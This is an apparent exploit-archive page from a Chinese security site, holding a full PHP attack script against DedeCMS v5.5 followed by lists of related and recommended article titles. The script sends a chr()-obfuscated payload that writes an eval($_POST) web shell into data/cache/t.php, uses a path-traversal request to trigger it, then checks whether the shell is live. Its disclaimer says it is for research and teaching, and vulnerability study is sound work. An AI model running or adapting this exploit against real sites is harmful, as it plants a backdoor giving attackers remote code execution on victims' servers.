测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    21. $host = $argv[1];
    22. $path = $argv[2];
    23. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    24. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    25. $shell ='data/cache/t.php';
    26. get_send($post_a);
    27. post_send('plus/comments_frame.php',$post_b);
    28. $content = post_send($shell,'t=echo tojen;');
    29. if(substr($content,9,3)=='200'){
    30. echo "\nShell Address is:".$host.$path.$shell;
    31. }else{
    32. echo "\nError.";
    33. }
    34. function get_send($url){
    35. global $host, $path;
    36. $message ="GET ".$path."$url HTTP/1.1\r\n";
    37. $message .="Accept: */*\r\n";
    38. $message .="Referer: http://$host$path\r\n";
    39. $message .="Accept-Language: zh-cn\r\n";
    40. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    41. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    42. $message .="Host: $host\r\n";
    43. $message .="Connection: Close\r\n\r\n";
    44. $fp = fsockopen($host,80);
    45. if(!$fp){
    46. echo "\nConnect to host Error";
    47. }
    48. fputs($fp, $message);
    49. $back ='';
    50. while(!feof($fp))
    51. $back .= fread($fp,1024);
    52. fclose($fp);
    53. return $back;
    54. }
    55. function post_send($url,$cmd){
    56. global $host, $path;
    57. $message ="POST ".$path."$url HTTP/1.1\r\n";
    58. $message .="Accept: */*\r\n";
    59. $message .="Referer: http://$host$path\r\n";
    60. $message .="Accept-Language: zh-cn\r\n";
    61. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    62. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    63. $message .="Host: $host\r\n";
    64. $message .="Content-Length: ".strlen($cmd)."\r\n";
    65. $message .="Connection: Close\r\n\r\n";
    66. $message .= $cmd;
    67. $fp = fsockopen($host,80);
    68. if(!$fp){
    69. echo "\nConnect to host Error";
    70. }
    71. fputs($fp, $message);
    72. $back ='';
    73. while(!feof($fp))
    74. $back .= fread($fp,1024);
    75. fclose($fp);
    76. return $back;
    77. }
    78. ?>

dedecms v5.5 final getwebshell exploit(datalistcp.class.php)的更多相关文章

  1. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  2. DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

    漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为 ...

  3. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  4. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  5. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  6. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  7. DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)

    DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2版本中的 ...

  8. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  9. DeDeCMS v5.7 漏洞复现

    DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pik ...

随机推荐

  1. loadrunner获取毫秒及字符串替换实现

    loadrunner获取毫秒及字符串替换实现 今天做一个性能测试,参数化要求创建用户名不可以重复,想来想不没有什么好的办法来避免用户名字的重复.所以就想用时间+随机数来实现,但是实现中遇到一个问题. ...

  2. CentOS 7 kibana安装配置

    Kibana 是为Elasticsearch设计的开源分析和可视化平台,你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互.你可以很容易实现高级的数据分析 ...

  3. javascript右下角弹层及自动隐藏

    在编写项目中总会需要有个右下角弹层提示公告的需求,怎么用更简单方面,更简洁代码,实现更好用户体验这个就是我们的所要做的内容.市场这块弹层很多,但功能不尽如人意.下面分享早些时候自己编写,以及现在还在应 ...

  4. 计算机网络应用层之cookie

    一.生活中的cookie 无论你知不知道Cookie是什么,在你的生活中,肯定有使用过它.还记得你使用浏览器浏览网页时,当你要登陆时,网页上有一个记住密码或自动登陆的选项,当你选择时,你就使用了Coo ...

  5. dubbo 搭建开发环境

    本文是基于maven的,预先使用,先装maven. dubbo是一个分布式服务框架,提供一个SOA的解决方案.简单的说,dubbo就像在生产者和消费者中间架起了一座桥梁,使之能透明交互. 本文旨在搭建 ...

  6. 2017-2018-1 20179202《Linux内核原理与分析》第二周作业

    本周着重学习了汇编指令,并通过反汇编C程序了解栈帧变化. 实践 看了孟老师的演示视频后,我重新写了C程序,如下: int main() { int a=1,b=2; return g(a,b); } ...

  7. pycharm的安装教程及大坑

    在根据网上的教程创建新工程后,发现不能调用第三方库,网上大多给的是print('hello world'),己适python解释器用的pycharm默认的也不能发现错误.后来浏览了一篇文章才恍然大悟, ...

  8. 使用Jedis

    前言 借助Jedis可以在Java上操作Redis. Jedis 到https://mvnrepository.com/去找jar包下载即可. 如果是maven项目: <!-- https:// ...

  9. .zip格式和zip伪加密

    ZIP文件的组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 压缩源文件数据区 50 4B 03 04:这是头文件标记(0x04034b50) 14 00:解压文件所需 pkware ...

  10. PHP 笔记——会话控制

    1. Session的操作 1.1 启动 Session session_start(void):bool 1.2 注册 Session 会话变量启动后,全部被保存在全局数组$_SESSION[]中. ...